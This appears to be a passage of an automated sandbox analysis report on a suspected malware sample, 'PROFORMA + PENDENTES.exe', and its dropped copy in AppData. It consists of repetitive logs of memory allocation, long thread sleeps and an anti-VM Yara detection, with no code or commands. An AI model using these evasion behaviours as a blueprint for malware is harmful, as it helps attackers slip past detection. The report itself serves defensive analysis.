Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: PROFORMA + PENDENTES.exe PID: 7924, type: MEMORYSTR

Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Memory allocated: 2560000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Memory allocated: 2790000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Memory allocated: 25D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Memory allocated: 7AD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Memory allocated: 8AD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Memory allocated: 8C90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Memory allocated: 9C90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Memory allocated: FF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Memory allocated: 2D70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Memory allocated: 2BE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Memory allocated: E00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Memory allocated: 2A40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Memory allocated: 2890000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Memory allocated: 77A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Memory allocated: 87A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Memory allocated: 8950000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Memory allocated: 9950000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Memory allocated: 1360000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Memory allocated: 2C90000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Memory allocated: 4C90000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 599531	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 598953	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 598844	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 598719	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 598610	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 596620	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 596500	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 596391	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 596266	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 596047	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 595935	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 595828	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 595719	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 595500	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 595391	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 595276	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 595156	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 595047	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 594938	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 594828	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 594719	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 599890
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 599672
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 599562
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 599453
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 599344
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 599219
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 599109
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 599000
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 598884
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 598780
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 598672
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 598562
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 598453
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 598343
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 598232
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 598124
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 598015
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 597905
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 597797
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 597687
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 597578
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 597468
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 597359
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 597250
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 597140
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 597028
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 596921
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 596812
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 596703
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 596593
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 596483
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 596374
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 596265
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 596132
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 596031
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 595921
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 595812
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 595703
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 595593
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 595484
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 595375
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 595265
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 595156
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 595047
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 594937
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 594827
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 594716
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 593751

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6148	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8422	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 539	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Window / User API: threadDelayed 6876	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Window / User API: threadDelayed 2952	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Window / User API: threadDelayed 7618
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Window / User API: threadDelayed 2237

Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 7952	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1152	Thread sleep count: 6148 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1848	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 432	Thread sleep count: 243 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1036	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3232	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3568	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324	Thread sleep count: 35 > 30	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324	Thread sleep time: -32281802128991695s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324	Thread sleep time: -599891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3120	Thread sleep count: 6876 > 30	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3120	Thread sleep count: 2952 > 30	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324	Thread sleep time: -599641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324	Thread sleep time: -599531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324	Thread sleep time: -599422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324	Thread sleep time: -599313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324	Thread sleep time: -599188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324	Thread sleep time: -599063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324	Thread sleep time: -598953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324	Thread sleep time: -598844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324	Thread sleep time: -598719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324	Thread sleep time: -598610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324	Thread sleep time: -598485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324	Thread sleep time: -598360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324	Thread sleep time: -598235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324	Thread sleep time: -598110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324	Thread sleep time: -597985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324	Thread sleep time: -597860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324	Thread sleep time: -597735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324	Thread sleep time: -597610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324	Thread sleep time: -597485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324	Thread sleep time: -597360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324	Thread sleep time: -597235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324	Thread sleep time: -597110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324	Thread sleep time: -596985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324	Thread sleep time: -596860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324	Thread sleep time: -596735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324	Thread sleep time: -596620s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324	Thread sleep time: -596500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324	Thread sleep time: -596391s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324	Thread sleep time: -596266s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324	Thread sleep time: -596156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324	Thread sleep time: -596047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324	Thread sleep time: -595935s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324	Thread sleep time: -595828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324	Thread sleep time: -595719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324	Thread sleep time: -595609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324	Thread sleep time: -595500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324	Thread sleep time: -595391s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324	Thread sleep time: -595276s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324	Thread sleep time: -595156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324	Thread sleep time: -595047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324	Thread sleep time: -594938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324	Thread sleep time: -594828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324	Thread sleep time: -594719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324	Thread sleep time: -594610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324	Thread sleep time: -594485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324	Thread sleep time: -594360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324	Thread sleep time: -594235s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 4152	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736	Thread sleep time: -27670116110564310s >= -30000s
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736	Thread sleep time: -599890s >= -30000s
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 4520	Thread sleep count: 7618 > 30
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 4520	Thread sleep count: 2237 > 30
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736	Thread sleep time: -599781s >= -30000s
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736	Thread sleep time: -599672s >= -30000s
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736	Thread sleep time: -599562s >= -30000s
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736	Thread sleep time: -599453s >= -30000s
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736	Thread sleep time: -599344s >= -30000s
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736	Thread sleep time: -599219s >= -30000s
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736	Thread sleep time: -599109s >= -30000s
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736	Thread sleep time: -599000s >= -30000s
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736	Thread sleep time: -598884s >= -30000s
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736	Thread sleep time: -598780s >= -30000s
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736	Thread sleep time: -598672s >= -30000s
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736	Thread sleep time: -598562s >= -30000s
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736	Thread sleep time: -598453s >= -30000s
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736	Thread sleep time: -598343s >= -30000s
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736	Thread sleep time: -598232s >= -30000s
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736	Thread sleep time: -598124s >= -30000s
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736	Thread sleep time: -598015s >= -30000s
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736	Thread sleep time: -597905s >= -30000s
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736	Thread sleep time: -597797s >= -30000s
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736	Thread sleep time: -597687s >= -30000s
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736	Thread sleep time: -597578s >= -30000s
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736	Thread sleep time: -597468s >= -30000s
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736	Thread sleep time: -597359s >= -30000s
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736	Thread sleep time: -597250s >= -30000s
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736	Thread sleep time: -597140s >= -30000s
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736	Thread sleep time: -597028s >= -30000s
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736	Thread sleep time: -596921s >= -30000s
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736	Thread sleep time: -596812s >= -30000s
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736	Thread sleep time: -596703s >= -30000s
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736	Thread sleep time: -596593s >= -30000s
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736	Thread sleep time: -596483s >= -30000s
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736	Thread sleep time: -596374s >= -30000s
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736	Thread sleep time: -596265s >= -30000s
